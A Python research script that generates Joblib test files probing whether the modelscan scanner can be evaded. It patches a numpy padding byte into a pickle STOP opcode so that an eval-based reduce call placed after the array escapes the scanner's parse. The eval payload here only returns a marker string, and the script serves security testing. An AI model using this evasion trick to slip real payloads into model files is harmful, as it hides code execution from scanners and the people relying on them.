#!/usr/bin/env python3 """Generate benign Joblib artifacts for numpy padding traversal checks.""" from __future__ import annotations import argparse import io import json import os import pathlib import pickletools import re import shutil import subprocess from dataclasses import dataclass from typing import Any import joblib import numpy as np MARKER = "BENIGN_JOBLIB_MARKER" PICKLE_STOP = 0x2E JOBLIB_PADDING_BYTE = b"\xff" PICKLE_PROTOCOL = 4 class BenignEval: """Benign unsafe-global marker: eval returns a constant string only.""" def __reduce__(self) -> tuple[Any, tuple[str]]: return (eval, (repr(MARKER),)) @dataclass(frozen=True) class PaddingPatch: offset: int original_length: int patched_length: int inserted_bytes: int array_data_offset_before: int array_data_offset_after: int def dump_joblib_bytes(value: Any) -> bytes: buffer = io.BytesIO() joblib.dump(value, buffer, compress=0, protocol=PICKLE_PROTOCOL) return buffer.getvalue() def find_first_numpy_padding(data: bytes) -> int: ops: list[tuple[int, str]] = [] try: for opcode, _arg, pos in pickletools.genops(data): ops.append((pos, opcode.name)) except ValueError as exc: match = re.search(r"position (\d+)", str(exc)) if not match: raise RuntimeError(f"could not locate pickle parse stop: {exc}") from exc offset = int(match.group(1)) if not ops or ops[-1][1] != "BUILD": raise RuntimeError( "pickle parsing did not stop immediately after a numpy wrapper BUILD" ) if b"numpy_array_alignment_bytes" not in data[:offset]: raise RuntimeError("joblib numpy alignment metadata was not found") return offset raise RuntimeError("expected raw numpy array bytes to interrupt pickle parsing") def patch_padding_to_stop(data: bytes) -> tuple[bytes, PaddingPatch]: offset = find_first_numpy_padding(data) original_length = data[offset] if not 1 <= original_length <= 64: raise RuntimeError(f"unexpected joblib padding length: {original_length}") if original_length >= PICKLE_STOP: raise RuntimeError( f"padding length {original_length} does not need a STOP-byte expansion" ) inserted = PICKLE_STOP - original_length patched = ( data[:offset] + bytes([PICKLE_STOP]) + (JOBLIB_PADDING_BYTE * inserted) + data[offset + 1 :] ) patch = PaddingPatch( offset=offset, original_length=original_length, patched_length=PICKLE_STOP, inserted_bytes=inserted, array_data_offset_before=offset + 1 + original_length, array_data_offset_after=offset + 1 + PICKLE_STOP, ) return patched, patch def write_bytes(path: pathlib.Path, data: bytes) -> None: path.parent.mkdir(parents=True, exist_ok=True) path.write_bytes(data) def load_status(path: pathlib.Path) -> dict[str, Any]: try: value = joblib.load(path) except Exception as exc: return { "status": "error", "error": f"{type(exc).__name__}: {str(exc).splitlines()[0]}", } return { "status": "ok", "type": type(value).__name__, "repr": repr(value), "marker_found": contains_marker(value), } def contains_marker(value: Any) -> bool: if isinstance(value, str): return value == MARKER if isinstance(value, np.ndarray): return False if isinstance(value, (bytes, bytearray, memoryview)): return False if value is None: return False if isinstance(value, (bool, int, float, complex)): return False if isinstance(value, dict): return any(contains_marker(item) for item in value.values()) if isinstance(value, (list, tuple)): return any(contains_marker(item) for item in value) return False def opcode_positions(data: bytes, opcode_name: str, start: int = 0) -> list[int]: positions: list[int] = [] for opcode, _arg, pos in pickletools.genops(data[start:]): if opcode.name == opcode_name: positions.append(start + pos) return positions def opcode_offsets(data: bytes) -> dict[str, int | None]: offsets: dict[str, int | None] = { "builtins_string": find_bytes(data, b"builtins"), "eval_string": find_bytes(data, b"eval"), "marker_string": find_bytes(data, MARKER.encode()), "final_stop_opcode": data.rfind(bytes([PICKLE_STOP])), } return offsets def find_bytes(data: bytes, needle: bytes) -> int | None: offset = data.find(needle) return offset if offset >= 0 else None def modelscan(path: pathlib.Path, command: pathlib.Path | None) -> dict[str, Any]: if command is None: return {"status": "skipped"} if not command.exists(): return {"status": "missing", "command": str(command)} completed = subprocess.run( [ str(command), "-p", str(path), "-r", "json", "--show-skipped", ], text=True, capture_output=True, env={**os.environ, "COLUMNS": "20000"}, check=False, ) stdout = completed.stdout.strip() json_start = stdout.find("{") parsed: dict[str, Any] if json_start >= 0: try: parsed = json.loads(stdout[json_start:]) except json.JSONDecodeError: parsed = {"parse_error": stdout} else: parsed = {"parse_error": stdout} summary = parsed.get("summary") if isinstance(parsed, dict) else None return { "status": "ok" if "parse_error" not in parsed else "parse_error", "returncode": completed.returncode, "modelscan_version": summary.get("modelscan_version") if summary else None, "total_issues": summary.get("total_issues") if summary else None, "errors": parsed.get("errors") if isinstance(parsed, dict) else None, } def summarize( case: str, path: pathlib.Path, modelscan_command: pathlib.Path | None, extra_offsets: dict[str, Any] | None = None, ) -> dict[str, Any]: data = path.read_bytes() offsets: dict[str, Any] = opcode_offsets(data) if extra_offsets: offsets.update(extra_offsets) return { "case": case, "path": str(path), "size": len(data), "joblib_load": load_status(path), "offsets": offsets, "modelscan": modelscan(path, modelscan_command), } def main() -> int: parser = argparse.ArgumentParser() parser.add_argument( "output_dir", nargs="?", type=pathlib.Path, default=pathlib.Path("corpus/joblib_numpy_padding_probe"), ) parser.add_argument( "--modelscan-command", type=pathlib.Path, default=None, ) parser.add_argument("--skip-modelscan", action="store_true") args = parser.parse_args() modelscan_command = None if args.skip_modelscan else resolve_modelscan_command( args.modelscan_command ) control_path = args.output_dir / "control_direct.joblib" candidate_path = args.output_dir / "candidate_numpy_array_then_payload_patched.joblib" control_bytes = dump_joblib_bytes(BenignEval()) write_bytes(control_path, control_bytes) array = np.array([PICKLE_STOP, 0, 1, 2, 3, 4, 5, 6], dtype=np.uint8) candidate_bytes = dump_joblib_bytes([array, BenignEval()]) patched_candidate_bytes, patch = patch_padding_to_stop(candidate_bytes) write_bytes(candidate_path, patched_candidate_bytes) print( json.dumps( summarize( "control_direct", control_path, modelscan_command, { "payload_reduce_opcode_offsets": opcode_positions( control_bytes, "REDUCE", ) }, ), sort_keys=True, ) ) payload_frame_offset = patch.array_data_offset_after + array.nbytes print( json.dumps( summarize( "candidate_numpy_array_then_payload_patched", candidate_path, modelscan_command, { "padding_length_offset": patch.offset, "padding_original_length": patch.original_length, "padding_patched_length": patch.patched_length, "padding_inserted_bytes": patch.inserted_bytes, "array_data_offset_before_patch": patch.array_data_offset_before, "array_data_offset_after_patch": patch.array_data_offset_after, "array_first_byte_after_patch": patched_candidate_bytes[ patch.array_data_offset_after ], "payload_frame_offset_after_patch": payload_frame_offset, "payload_reduce_opcode_offsets_after_patch": opcode_positions( patched_candidate_bytes, "REDUCE", payload_frame_offset, ), }, ), sort_keys=True, ) ) return 0 def resolve_modelscan_command(command: pathlib.Path | None) -> pathlib.Path | None: if command is not None: return command local_command = pathlib.Path(".venv-modelscan/bin/modelscan") if local_command.exists(): return local_command path_command = shutil.which("modelscan") if path_command is not None: return pathlib.Path(path_command) return local_command if __name__ == "__main__": raise SystemExit(main())